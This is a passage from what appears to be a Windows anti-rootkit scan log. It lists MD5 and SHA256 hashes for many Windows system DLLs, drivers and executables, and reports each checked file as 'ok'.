15:33:59.0002 0x04bc  [ F29FE765E1448EF371CFE05BFAC74ADB, F251581222D78543272FD4B14A6A59F4B0E0CC44A5FCBCF56DE4CA5783F78A75 ] C:\Windows\System32\tsddd.dll
15:33:59.0002 0x04bc  C:\Windows\System32\tsddd.dll - ok
15:33:59.0004 0x04bc  [ DCA68B0943D6FA415F0C56C92158A83A, BEE5A5B33B22D1DF50B884D46D89FC3B8286EB16E38AD5A20F0A49E5C6766C57 ] C:\Windows\System32\drivers\usbccgp.sys
15:33:59.0004 0x04bc  C:\Windows\System32\drivers\usbccgp.sys - ok
15:33:59.0006 0x04bc  [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\System32\sxssrv.dll
15:33:59.0006 0x04bc  C:\Windows\System32\sxssrv.dll - ok
15:33:59.0007 0x04bc  [ 94355C28C1970635A31B3FE52EB7CEBA, C4E98F07170CEC69CACDD5CEDB8927E48A2A299CB1B8CDA87526E768AF6174F0 ] C:\Windows\System32\wininit.exe
15:33:59.0007 0x04bc  C:\Windows\System32\wininit.exe - ok
15:33:59.0009 0x04bc  [ EB858F978494AAB02C85E02ABBD7F549, 561806460760CBE4D1E3D4E66ADC5C828A4342AD16A1F4A3916FFCDBE9419A28 ] C:\Windows\System32\AMInit64.dll
15:33:59.0009 0x04bc  C:\Windows\System32\AMInit64.dll - ok
15:33:59.0011 0x04bc  [ 9CEAD32E79A62150FE9F8557E58E008B, AFE4C1725EE94D7DE0749AE1495A4E5CC33C369F29B2A589DA66FFE27FF9777E ] C:\Windows\System32\sxs.dll
15:33:59.0011 0x04bc  C:\Windows\System32\sxs.dll - ok
15:33:59.0013 0x04bc  [ 78523A26F5604C0568FE9D1CE86E36F4, 534A7228BF69719106F581616A32EAEF0B770DDB36DCE94F84E7D52FDB1382B5 ] C:\Windows\System32\KBDUS.DLL
15:33:59.0013 0x04bc  C:\Windows\System32\KBDUS.DLL - ok
15:33:59.0015 0x04bc  [ C2A8CB1275ECB85D246A9ECC02A728E3, 3603FADCA0060BD201148F9D59E4E2627F024609A6463AB525B5D1AD17BDCD10 ] C:\Windows\System32\RpcRtRemote.dll
15:33:59.0015 0x04bc  C:\Windows\System32\RpcRtRemote.dll - ok
15:33:59.0017 0x04bc  [ B26B1801356760841C3BC69F9F91537F, 83B9DF333E36C09E81D44E12AE5BE14650126FDA0CF4A0EA853BF40C5780EF81 ] C:\Windows\System32\WlS0WndH.dll
15:33:59.0017 0x04bc  C:\Windows\System32\WlS0WndH.dll - ok
15:33:59.0018 0x04bc  [ 784FA3DF338E2E8F5F0389D6FAC428AF, 9C8AA0CFDEB9E38AAF8EB08626070E0F0364F4F8A793CFE3532EC6C007980C34 ] C:\Windows\System32\cryptbase.dll
15:33:59.0018 0x04bc  C:\Windows\System32\cryptbase.dll - ok
15:33:59.0020 0x04bc  [ 90499F3163A9F815CF196A205EA3CD5D, 29B4ED3795CEC1177EB367132914CE21C194CDEC5DB9DC923FD928C85E94D821 ] C:\Windows\System32\apphelp.dll
15:33:59.0020 0x04bc  C:\Windows\System32\apphelp.dll - ok
15:33:59.0022 0x04bc  [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\System32\services.exe
15:33:59.0022 0x04bc  C:\Windows\System32\services.exe - ok
15:33:59.0024 0x04bc  [ 710861E2AB416FCAE7363DD3CC6A0025, C7C3286EF849F86DBA9709D4C3AB403166197B7F1E9E455E0582E7F55B803A22 ] C:\Windows\System32\sysfer.dll
15:33:59.0024 0x04bc  C:\Windows\System32\sysfer.dll - ok
15:33:59.0025 0x04bc  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] C:\Windows\System32\lsass.exe
15:33:59.0025 0x04bc  C:\Windows\System32\lsass.exe - ok
15:33:59.0027 0x04bc  [ C072064F95579C0D6D86AF5B3DC53192, CF4A088DF97F4D4963BEAB9CBDBF69FEA2D4773159054A0AF8B8DFFDF83E18DA ] C:\Windows\System32\sspicli.dll
15:33:59.0027 0x04bc  C:\Windows\System32\sspicli.dll - ok
15:33:59.0029 0x04bc  [ 9662EE182644511439F1C53745DC1C88, D205B2C163E78AB42A5D67D7664EF6B75EA0374FF0924467D624F9DB0611F0AD ] C:\Windows\System32\lsm.exe
15:33:59.0029 0x04bc  C:\Windows\System32\lsm.exe - ok
15:33:59.0031 0x04bc  [ 68083118797CAF30FB2EA3E71494D67E, 5F1BCDFCB00A20CD60CBC70A2FD97405EF0F7173DD0E404BBA7B06D39DB37364 ] C:\Windows\System32\sysntfy.dll
15:33:59.0031 0x04bc  C:\Windows\System32\sysntfy.dll - ok
15:33:59.0033 0x04bc  [ DEE7267C5D232A3B816866872CE199E6, A1994FD37667C52E7CBF873514C190DA61A3D1349786D187BFAE0006F61799AE ] C:\Windows\System32\wmsgapi.dll
15:33:59.0033 0x04bc  C:\Windows\System32\wmsgapi.dll - ok
15:33:59.0034 0x04bc  [ E914A50A151DFFE63D3935226DB5E2C1, 7DCCE4060344E1C771679F1C20378A0BEB3C1F06DB684072F07B98921A62A299 ] C:\Windows\System32\scext.dll
15:33:59.0034 0x04bc  C:\Windows\System32\scext.dll - ok
15:33:59.0036 0x04bc  [ EE4B105F1DBE1E864AFC72E7F0315432, 0E69A25BA7ED920B3103F219D3BF117D8CEFBD4DC74C762945AE291D24772FAD ] C:\Windows\System32\lsasrv.dll
15:33:59.0036 0x04bc  C:\Windows\System32\lsasrv.dll - ok
15:33:59.0038 0x04bc  [ BBCDF350817BA86416C0F06B6981BE8D, D064438F97852B9BD6015C8B19377C61C671E0969E09506B8359FE7B1F373A61 ] C:\Windows\System32\scesrv.dll
15:33:59.0038 0x04bc  C:\Windows\System32\scesrv.dll - ok
15:33:59.0040 0x04bc  [ 39312B37C5FE5138F99680A49ACD3AEA, B9566B4117FBBECF77A0D3F49E9DF302088B9D483F817720B22E4F9C5754264A ] C:\Windows\System32\secur32.dll
15:33:59.0040 0x04bc  C:\Windows\System32\secur32.dll - ok
15:33:59.0041 0x04bc  [ 8098627D0AA1706D69C5AF3F74332ABB, 9582F6162A8405DC568FFBEA08A9090FE92FE2C9DB640077BD7F23AC4FABF700 ] C:\Windows\System32\sspisrv.dll
15:33:59.0041 0x04bc  C:\Windows\System32\sspisrv.dll - ok
15:33:59.0043 0x04bc  [ 3A9C9BAF610B0DD4967086040B3B62A9, E8E9A0F42B1EE7806EDCEED08AA024D037215D06CA317E3678BD5364AD513D23 ] C:\Windows\System32\srvcli.dll
15:33:59.0043 0x04bc  C:\Windows\System32\srvcli.dll - ok
15:33:59.0045 0x04bc  [ A744BA6E04C8AA4592818178DBF89521, 9E7C85D842DF16F9B8FED7B06AF309B5ECCBFD465F5552347D4C3F1FEFDC6F7A ] C:\Windows\System32\samsrv.dll
15:33:59.0045 0x04bc  C:\Windows\System32\samsrv.dll - ok
15:33:59.0047 0x04bc  [ 3A061472B38233BAFF9CFEFF2E49C46B, DF29B14C8D22A8A16AA336A09A6152E2C7FCA6CAF4E76F0C5DCB55BEF9D00515 ] C:\Windows\System32\cryptdll.dll
15:33:59.0047 0x04bc  C:\Windows\System32\cryptdll.dll - ok
15:33:59.0049 0x04bc  [ 3C073B0C596A0AF84933E7406766B040, 4698BBA678F553E15AD4B07AD7FB236281F872DEFEE97BFD637114476C8F97B3 ] C:\Windows\System32\wevtapi.dll
15:33:59.0049 0x04bc  C:\Windows\System32\wevtapi.dll - ok
15:33:59.0050 0x04bc  [ 7FBEBD2229EA5FD48D41B199EC2D541C, A465975D445A8D50CAF3EF29BD33354B320D11173C127BE30D5EBBFF7008CDCE ] C:\Windows\System32\authz.dll
15:33:59.0050 0x04bc  C:\Windows\System32\authz.dll - ok
15:33:59.0052 0x04bc  [ 86FE1B1F8FD42CD0DB641AB1CDB13093, 8C4BB4415105CE82FFFE658879EAE9D259A24C0F6DFC7D25507352DC99241BE2 ] C:\Windows\System32\cngaudit.dll
15:33:59.0052 0x04bc  C:\Windows\System32\cngaudit.dll - ok
15:33:59.0054 0x04bc  [ 747B9BA5412422F27934CB21131F0A3E, 2441F925C3B46A15141A0A1E1AA9DFCCA2891D823D55C6E6DA0E30C2DE3A7341 ] C:\Windows\System32\ncrypt.dll
15:33:59.0054 0x04bc  C:\Windows\System32\ncrypt.dll - ok
15:33:59.0056 0x04bc  [ B9A95365E52F421A20E1501935FADDA5, DDB4CB575139233EFAF2C59B7E9B04AF36BBCCC63190181F3B2A7E6BFC86E77E ] C:\Windows\System32\bcrypt.dll
15:33:59.0056 0x04bc  C:\Windows\System32\bcrypt.dll - ok
15:33:59.0058 0x04bc  [ 02B64609F865A39365FF88580DF11738, 2F676B93898E1B6131AF6227BB7AB731EB9C29477F9BD4C2C60F0FC1E35CD968 ] C:\Windows\System32\msprivs.dll
15:33:59.0058 0x04bc  C:\Windows\System32\msprivs.dll - ok
15:33:59.0060 0x04bc  [ C6505DE3561537BA1004D638C2F93F2F, 3E4FDF374B1A9E43A8F61FD2D79E0515390ECABFDAF72C4BD44A7B6429039AF6 ] C:\Windows\System32\netjoin.dll
15:33:59.0060 0x04bc  C:\Windows\System32\netjoin.dll - ok
15:33:59.0062 0x04bc  [ 50532FCD7ECF02DD169CE5C485F02534, 8EE5D9D0EA53DC72BCC300692E521ACADD56AB09BFA3E78149D8B5A90648512C ] C:\Windows\System32\negoexts.dll
15:33:59.0062 0x04bc  C:\Windows\System32\negoexts.dll - ok
15:33:59.0064 0x04bc  [ 33EF550DCCC58C93F5B65FD75BAD9832, 904DA99D4CBE5904E8D2580077FBB8909A44147F95492929D9A7A581C06645A8 ] C:\Windows\System32\kerberos.dll
15:33:59.0064 0x04bc  C:\Windows\System32\kerberos.dll - ok
15:33:59.0066 0x04bc  [ D0C2FBB6D97416B0166478FC7AE2B212, 7EAB6C37F0A845E645CA44CC060AC6C56E386C7EF7A64716C6786C9602AD8C9D ] C:\Windows\System32\cryptsp.dll
15:33:59.0066 0x04bc  C:\Windows\System32\cryptsp.dll - ok
15:33:59.0067 0x04bc  [ 9A9F9F1A77D6A80EE28B57664F00013E, 0D441638E086EF1342FCDC43E826BF9E9CC6B2E8AE100D89BFC70163F987DE91 ] C:\Windows\System32\mswsock.dll
15:33:59.0067 0x04bc  C:\Windows\System32\mswsock.dll - ok
15:33:59.0069 0x04bc  [ EC7CBFF96B05ECF3D366355B3C64ADCF, F69ED45EBEDCA9CF000AC03281F0EC2C351F98513FBA90E63394E4E561D6C7A2 ] C:\Windows\System32\wship6.dll
15:33:59.0069 0x04bc  C:\Windows\System32\wship6.dll - ok
15:33:59.0071 0x04bc  [ E2A483E796D5FC7E447725FD01D98FA0, 78F7F253CE8391A9BD073AC507A55A29B562AFBB0154C2DA8F5E837CA8DE8B79 ] C:\Windows\System32\msv1_0.dll
15:33:59.0071 0x04bc  C:\Windows\System32\msv1_0.dll - ok
15:33:59.0073 0x04bc  [ F866FF235A40575981DF01F3E98AEA04, BDF0204712E3553D0432D69CE54AB4AEB51B830EC12012E0F5CA9004BCC128A6 ] C:\Windows\System32\netlogon.dll
15:33:59.0073 0x04bc  C:\Windows\System32\netlogon.dll - ok
15:33:59.0075 0x04bc  [ 492D07D79E7024CA310867B526D9636D, F2FE647AB85C6C3C1AA3DF4BCE6E4D42B9676C9D837E11388C235AE8DB20044F ] C:\Windows\System32\dnsapi.dll
15:33:59.0075 0x04bc  C:\Windows\System32\dnsapi.dll - ok
15:33:59.0076 0x04bc  [ 8FFE297B8449386E7B6851458B6E474E, E149B37E11091D69D926242517E5655596594A6F01FEF06EB65D6BA5B354E326 ] C:\Windows\System32\logoncli.dll
15:33:59.0076 0x04bc  C:\Windows\System32\logoncli.dll - ok
15:33:59.0078 0x04bc  [ 481F70241D4EA038BB02590A30F15A23, 794418F8538BE8B90531C99C876D40625FC7C39FDCFCA9114843F44F9FE6D85C ] C:\Windows\System32\schannel.dll
15:33:59.0078 0x04bc  C:\Windows\System32\schannel.dll - ok
15:33:59.0080 0x04bc  [ 26AF184300C0868D854D5A3092234E24, 46FFF8B9212F2AE99D494A7BD1CDD5C95F451593B46CECAF25CE897931374250 ] C:\Windows\System32\wdigest.dll
15:33:59.0080 0x04bc  C:\Windows\System32\wdigest.dll - ok
15:33:59.0082 0x04bc  [ 5D8874A8C11DDDDE29E12DE0E2013493, 3E9A57137BF622AF83E3E4D58971E2C0200559CCA7545D16CF263AA03EE9C7D2 ] C:\Windows\System32\rsaenh.dll
15:33:59.0082 0x04bc  C:\Windows\System32\rsaenh.dll - ok
15:33:59.0083 0x04bc  [ E08088A97F95345E181C3DFCE2C615EF, DEF3B087DF5E10E4F8418029DB6E82546E62FEFA39694B7BD6A48CE8AAFD1B96 ] C:\Windows\System32\pku2u.dll
15:33:59.0084 0x04bc  C:\Windows\System32\pku2u.dll - ok
15:33:59.0085 0x04bc  [ B6D8C1202DACA028AD94BDA2795CBBE9, 967DA60ED456F6DC0D1D5F793DB947E81427811FA98BEF215A55F0171C204A12 ] C:\Windows\System32\TSpkg.dll
15:33:59.0085 0x04bc  C:\Windows\System32\TSpkg.dll - ok
15:33:59.0087 0x04bc  [ D6C7780A364C6BBACFA796BAB9F1B374, 3B5ED1A030BFD0BB73D4FFCD67A6A0B8501EF70293F223EFAA12F430ADF270F9 ] C:\Windows\System32\bcryptprimitives.dll
15:33:59.0087 0x04bc  C:\Windows\System32\bcryptprimitives.dll - ok
15:33:59.0089 0x04bc  [ 6CECA4C6A489C9B2E6073AFDAAE3F607, 127506D1DB38275614CBEB047C133718EF9D03266BA9C98BE55EC7847CFC9C3D ] C:\Windows\System32\netutils.dll
15:33:59.0089 0x04bc  C:\Windows\System32\netutils.dll - ok
15:33:59.0091 0x04bc  [ 82A72E99AA1CF0B04D3B9843CBA3AEC1, 0CB811379A40A993544013FA36A9B49532A9954CD8CD0D376E3B740F028C90C4 ] C:\Windows\System32\credssp.dll
15:33:59.0091 0x04bc  C:\Windows\System32\credssp.dll - ok
15:33:59.0093 0x04bc  [ 90BDEFC5DF334E5100EAA781D798DE1A, F48B650D811B6D57D2252E326C0C9CC74534BE9D510E7D3403F91D1C5C36281E ] C:\Windows\System32\efslsaext.dll
15:33:59.0093 0x04bc  C:\Windows\System32\efslsaext.dll - ok
15:33:59.0095 0x04bc  [ ED78427259134C63ED69804D2132B86C, F6F51B8B35881ABCA5580ED111AAC80E466E6474ABAE31EC8BE46C23EDCA77B2 ] C:\Windows\System32\scecli.dll
15:33:59.0095 0x04bc  C:\Windows\System32\scecli.dll - ok
15:33:59.0096 0x04bc  [ 943F527DF79E6B400104341AA7023C75, 53C7B9426181D3D172E6B1A07E6DF8A0CB8FCA27D3A03CE5F544D3209B5F4651 ] C:\Windows\System32\cdd.dll
15:33:59.0096 0x04bc  C:\Windows\System32\cdd.dll - ok
15:33:59.0098 0x04bc  [ 88AB9B72B4BF3963A0DE0820B4B0B06C, 29EFEADCB26E408CD41492FCEC6D411A018099D6FF5ECA9526ED59564975F3E6 ] C:\Windows\System32\winlogon.exe
15:33:59.0098 0x04bc  C:\Windows\System32\winlogon.exe - ok
15:33:59.0100 0x04bc  [ 0D9764D58C5EFD672B7184854B152E5E, 9827B43DABBEC39AB2E2294408D9C5304EF27A684903C5234C6070387723D49E ] C:\Windows\System32\winsta.dll
15:33:59.0100 0x04bc  C:\Windows\System32\winsta.dll - ok
15:33:59.0102 0x04bc  [ 7CC7DF5B654DA579613F811D8C637E29, 70EAC059C1ED814810C75DBB9F4D188428CB942FFD8869D692158D384EB6BB35 ] C:\Windows\System32\ubpm.dll
15:33:59.0102 0x04bc  C:\Windows\System32\ubpm.dll - ok
15:33:59.0103 0x04bc  [ DFDE777FAF31DC25E3624E8071073146, CA681BE51C182A256F526D51458E5D74472874F22265D0D44459832CA61B9C53 ] C:\Windows\System32\svchost.exe
15:33:59.0103 0x04bc  C:\Windows\System32\svchost.exe - ok
15:33:59.0105 0x04bc  [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] C:\Windows\System32\umpnpmgr.dll
15:33:59.0105 0x04bc  C:\Windows\System32\umpnpmgr.dll - ok
15:33:59.0107 0x04bc  [ CD1B5AD07E5F7FEF30E055DCC9E96180, 63C58551F32B0B09377F64A6AE1FA81AF93B8A707A57A8C18722086906AD3046 ] C:\Windows\System32\devrtl.dll
15:33:59.0107 0x04bc  C:\Windows\System32\devrtl.dll - ok
15:33:59.0109 0x04bc  [ E6EB44ABAAF1F330119F854856C53EBE, 77279972FFBFA984578DD4F17EB615F5D2D93590AF3A9FEFEFDB9128206C9887 ] C:\Windows\System32\SPInf.dll
15:33:59.0109 0x04bc  C:\Windows\System32\SPInf.dll - ok
15:33:59.0110 0x04bc  [ 9C9307C95671AC962F3D6EB3A4A89BAE, D1433791C9B8BCEEAD8937EC18D33E89E4E2012B5975228A8500FD141BC30078 ] C:\Windows\System32\gpapi.dll
15:33:59.0110 0x04bc  C:\Windows\System32\gpapi.dll - ok
15:33:59.0112 0x04bc  [ B2392DBB9085E39AAB5204BE92FB3AB0, BB7741859C9FB5B3DCA98DDC2869C05AD06DA896F5B0CA821D433C46463F8536 ] C:\Windows\System32\umpo.dll
15:33:59.0112 0x04bc  C:\Windows\System32\umpo.dll - ok
15:33:59.0114 0x04bc  [ F6C011B46FAEEF33536B2E80F48B5CBE, BDD149D3D6F9F6C8F6F34C311219BE5618CEEFBC7D35E37473A47F1D5D015067 ] C:\Windows\System32\pcwum.dll
15:33:59.0114 0x04bc  C:\Windows\System32\pcwum.dll - ok
15:33:59.0116 0x04bc  [ 716175021BDA290504CE434273F666BC, FA18CA2D8A5F4335E051E2933147D3C1E7308F7D446E2AEB6596CDEF6E2AFC88 ] C:\Windows\System32\powrprof.dll
15:33:59.0116 0x04bc  C:\Windows\System32\powrprof.dll - ok
15:33:59.0117 0x04bc  [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] C:\Windows\System32\drivers\luafv.sys
15:33:59.0117 0x04bc  C:\Windows\System32\drivers\luafv.sys - ok
15:33:59.0119 0x04bc  [ F3EF088F45BE326B4EDAC8C1C5A35105, 6A8F992981AB68F811E3EF51545A0B0572A88C746472D24042646329B581F519 ] C:\Windows\System32\rpcss.dll
15:33:59.0119 0x04bc  C:\Windows\System32\rpcss.dll - ok
15:33:59.0121 0x04bc  [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] C:\Windows\System32\RpcEpMap.dll
15:33:59.0121 0x04bc  C:\Windows\System32\RpcEpMap.dll - ok
15:33:59.0123 0x04bc  [ 16E964ABF6D1E0F0CC7822FCA9BA754D, 0E461387ACFD641DA22EE542A3C68AF5F7D3A7F967D974E3B198143D461ABE39 ] C:\Windows\System32\wshqos.dll
15:33:59.0123 0x04bc  C:\Windows\System32\wshqos.dll - ok
15:33:59.0125 0x04bc  [ 31559F3244C6BC00A52030CAA83B6B91, B2025742B5F0025ACE9821D5722DE3F997EEEAB21D2F381C9E307882DF422579 ] C:\Windows\System32\WSHTCPIP.DLL
15:33:59.0125 0x04bc  C:\Windows\System32\WSHTCPIP.DLL - ok
15:33:59.0126 0x04bc  [ 9AD9E06F8656F296D91FAE8EE5B95A27, 53384747D5864D699BCC4F48E0A5E656430EDAA65DCDAB4B11EA68FC7106459E ] C:\Windows\System32\FirewallAPI.dll
15:33:59.0126 0x04bc  C:\Windows\System32\FirewallAPI.dll - ok
15:33:59.0128 0x04bc  [ 4D4FD703DBE396747F22874B6DDA3D4E, 823F3CAAC0B0F664D61CB29F359F205FD43DC9D1B95D6B4EFBEB475BE87160EF ] C:\Windows\System32\atiesrxx.exe
15:33:59.0128 0x04bc  C:\Windows\System32\atiesrxx.exe - ok
15:33:59.0130 0x04bc  [ 715F03B4C7223349768013EA95D9E5B7, 09AB0535A54C2E2962F0FD06988D99060F8CECA39B07AC00A63204C773B95893 ] C:\Windows\System32\LogonUI.exe
15:33:59.0130 0x04bc  C:\Windows\System32\LogonUI.exe - ok
15:33:59.0132 0x04bc  [ 1F4492FE41767CDB8B89D17655847CDD, 184547FAC0C3D7148FAA3F601929A7089DE393BD19929A137DAD743331DD3F77 ] C:\Windows\System32\ntmarta.dll
15:33:59.0132 0x04bc  C:\Windows\System32\ntmarta.dll - ok
15:33:59.0134 0x04bc  [ BD3674BE7FC9D8D3732C83E8499576ED, E6716A5895D629263A4D21959F48840429AB6F4B55A5FA2663EE5E86C9CA2BF1 ] C:\Windows\System32\wtsapi32.dll
15:33:59.0134 0x04bc  C:\Windows\System32\wtsapi32.dll - ok
15:33:59.0136 0x04bc  [ 94E026870A55AAEAFF7853C1754091E9, B2F5D5629D12BDFA98DBED3898368F37D9009C7531B6909C7285A2C11C9A0F93 ] C:\Windows\System32\version.dll
15:33:59.0136 0x04bc  C:\Windows\System32\version.dll - ok
15:33:59.0137 0x04bc  [ 075A9631430EE59BDE80CF91D153DC08, 813F81E722E99A28C09E3254E5E368108698E6911652E157E70D7B5A55DA5BCC ] C:\Windows\System32\authui.dll
15:33:59.0137 0x04bc  C:\Windows\System32\authui.dll - ok
15:33:59.0139 0x04bc  [ 6011714C8C5C55CBFFAD24D61E879FBD, 75D615082A1C71C6ED3ABB49EDAF660EE538D112CF79B9C8AF0A583D1CE1BBB0 ] C:\Windows\System32\wevtsvc.dll
15:33:59.0139 0x04bc  C:\Windows\System32\wevtsvc.dll - ok
15:33:59.0141 0x04bc  [ 78A1E65207484B7F8D3217507745F47C, 35F413ADB9D157F3666DD15DD58104D629CD9143198A1AB914B73A4A3C9903DD ] C:\Windows\System32\avrt.dll
15:33:59.0141 0x04bc  C:\Windows\System32\avrt.dll - ok
15:33:59.0143 0x04bc  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] C:\Windows\System32\mmcss.dll
15:33:59.0143 0x04bc  C:\Windows\System32\mmcss.dll - ok
15:33:59.0144 0x04bc  [ F23FEF6D569FCE88671949894A8BECF1, FCE7B156ED663471CF9A736915F00302E93B50FC647563D235313A37FCE8F0F6 ] C:\Windows\System32\audiosrv.dll
15:33:59.0144 0x04bc  C:\Windows\System32\audiosrv.dll - ok
15:33:59.0146 0x04bc  [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] C:\Windows\System32\FntCache.dll
15:33:59.0146 0x04bc  C:\Windows\System32\FntCache.dll - ok
15:33:59.0148 0x04bc  [ 227E2C382A1E02F8D4965E664D3BBE43, 1CFF20A8BF87ACE4FA4935EBEED72BFB1A1FE902A754899E2F50798D67DF5642 ] C:\Windows\System32\MMDevAPI.dll
15:33:59.0148 0x04bc  C:\Windows\System32\MMDevAPI.dll - ok
15:33:59.0150 0x04bc  [ F06BB4E336EA57511FDBAFAFCC47DE62, BE43EC62548E9FF89A9495A1722E22DBB76EEC3764F86E64057B636F27D15765 ] C:\Windows\System32\propsys.dll
15:33:59.0150 0x04bc  C:\Windows\System32\propsys.dll - ok
15:33:59.0151 0x04bc  [ D5CCA1453B98A5801E6D5FF0FF89DC6C, 85F2C2480AAC31B6092187B431A562D79D4CFB1324F925C85055ABAB2483264B ] C:\Windows\System32\audiodg.exe
15:33:59.0152 0x04bc  C:\Windows\System32\audiodg.exe - ok
15:33:59.0153 0x04bc  [ 13E7EB404B935ED29D5D63242BC15675, F785B0C56996BFCCA71F0C62FDC7B2E4589A3A26DA3087D335961636AC426222 ] C:\Windows\System32\cscsvc.dll
15:33:59.0153 0x04bc  C:\Windows\System32\cscsvc.dll - ok
15:33:59.0155 0x04bc  [ 72C67373E37F4DE241390065E981E3D1, BABB4039BB3E69C259F194D76449D47C6EA674DAA4E63EA4F29521C1416B5661 ] C:\Windows\System32\profsvc.dll
15:33:59.0155 0x04bc  C:\Windows\System32\profsvc.dll - ok
15:33:59.0157 0x04bc  [ 29910D50542B1AA0F162EF3339C61B6D, 018F0922384A5757390652865BB2DF876E9DA08B0858BC619B41D2CD14533ED4 ] C:\Windows\System32\PeerDist.dll
15:33:59.0157 0x04bc  C:\Windows\System32\PeerDist.dll - ok
15:33:59.0159 0x04bc  [ B3BFBD758506ECB50C5804AAA76318F9, 34E079A6AB2D41D1E0B3887B6AE31C43941061B7176FFF2801C3F465C2C89578 ] C:\Windows\System32\cryptui.dll
15:33:59.0159 0x04bc  C:\Windows\System32\cryptui.dll - ok
15:33:59.0160 0x04bc  [ 7FA8FDC2C2A27817FD0F624E78D3B50C, 7B63F6AA2CD6D4D07EA3C595B868B1A0749BB11620027A2BD9B935E3055481E4 ] C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll
15:33:59.0160 0x04bc  C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll - ok
15:33:59.0162 0x04bc  [ D29E998E8277666982B4F0303BF4E7AF, 4F19AB5DC173E278EBE45832F6CEAA40E2DF6A2EDDC81B2828122442FE5D376C ] C:\Windows\System32\uxtheme.dll
15:33:59.0162 0x04bc  C:\Windows\System32\uxtheme.dll - ok
15:33:59.0164 0x04bc  [ A9A87481B1A6589898C1DAB37C03E4AB, 803DB46E9FEE4E45B63A13A8CE3E589D7498532B8A7D8C3424E210E6A9AAC61F ] C:\Windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18455_none_2b283fd671e9bf4d\GdiPlus.dll
15:33:59.0164 0x04bc  C:\Windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18455_none_2b283fd671e9bf4d\GdiPlus.dll - ok
15:33:59.0166 0x04bc  [ 3CB6A7286422C72C34DAB54A5DFF1A34, 98D21EFFF511E407336A226420701E82554DA01FA05661303836B6860D63749D ] C:\Windows\System32\dui70.dll
15:33:59.0166 0x04bc  C:\Windows\System32\dui70.dll - ok
15:33:59.0168 0x04bc  [ 8CCDE014A4CDF84564E03ACE064CA753, DD663029B2EB7B12FDB00FCE403D8326141E540E3B9CE84CD5871473D3E2E2CF ] C:\Windows\System32\duser.dll
15:33:59.0168 0x04bc  C:\Windows\System32\duser.dll - ok
15:33:59.0170 0x04bc  [ DA1B7075260F3872585BFCDD668C648B, 3E10EF6E1A5C341B478322CB78A0AB7BFC70AD8023779B8B4542A7CB4CA756AB ] C:\Windows\System32\dwmapi.dll
15:33:59.0170 0x04bc  C:\Windows\System32\dwmapi.dll - ok
15:33:59.0172 0x04bc  [ 896F15A6434D93EDB42519D5E18E6B50, 9263F0CEC58D45EBE3FB9C3061FB9392C55A7933B84B4592E6EE13CFC86D5A50 ] C:\Windows\System32\hid.dll
15:33:59.0172 0x04bc  C:\Windows\System32\hid.dll - ok
15:33:59.0174 0x04bc  [ D7F1EF374A90709B31591823B002F918, 05FD2837C9B03D14BB2A969C1AD77CAEF047D93DC5D0F6C2ACBF0888E8F7B359 ] C:\Windows\System32\SndVolSSO.dll
15:33:59.0174 0x04bc  C:\Windows\System32\SndVolSSO.dll - ok
15:33:59.0175 0x04bc  [ 6F8B48F3D343E4B186AB6A9E302B7E16, 54DB52FC56509E61DF68BD251B3286E6CBE1A91D9BC4D950940A61FE2DA04DF8 ] C:\Windows\System32\xmllite.dll
15:33:59.0175 0x04bc  C:\Windows\System32\xmllite.dll - ok
15:33:59.0177 0x04bc  [ 58775492FFD419248B08325E583C527F, DBB013971F5894F25C222C2D4D50A29DB6DF3C413792EE9CCC1A9E6D85469093 ] C:\Windows\System32\atl.dll
15:33:59.0177 0x04bc  C:\Windows\System32\atl.dll - ok
15:33:59.0179 0x04bc  [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] C:\Windows\System32\themeservice.dll
15:33:59.0179 0x04bc  C:\Windows\System32\themeservice.dll - ok
15:33:59.0181 0x04bc  [ AFCA5C1ECEAF948FC815178BC077680E, D052C18EF455E1A272332F2E11FD4F36DA071FAB3B81CA312FB75BF8702ED72D ] C:\Windows\System32\WindowsCodecs.dll
15:33:59.0181 0x04bc  C:\Windows\System32\WindowsCodecs.dll - ok
15:33:59.0183 0x04bc  [ 588CD0C78A7FAAE4186B5EEA0AF3ED67, E957E4463D318A44BA5109EE3428624DE901C5FF2BA358986DF6C6F059DDBCC2 ] C:\Windows\System32\adtschema.dll
15:33:59.0183 0x04bc  C:\Windows\System32\adtschema.dll - ok
15:33:59.0184 0x04bc  [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] C:\Windows\System32\MPSSVC.dll
15:33:59.0184 0x04bc  C:\Windows\System32\MPSSVC.dll - ok
15:33:59.0186 0x04bc  [ 9F2BACD5E1776A4BB7CC0EC3C3A4F96D, 19959D18601712901F03B83150D15E34EBCAB355BB4692C9A28511A72F57FC66 ] C:\Windows\System32\winbrand.dll
15:33:59.0186 0x04bc  C:\Windows\System32\winbrand.dll - ok
15:33:59.0188 0x04bc  [ C2762A57DF0EE85E63CE4893C5215313, DDE22212D78353633CEDE27D7210469DE674563991105563CF64CCCE2D0743BD ] C:\Windows\System32\VaultCredProvider.dll
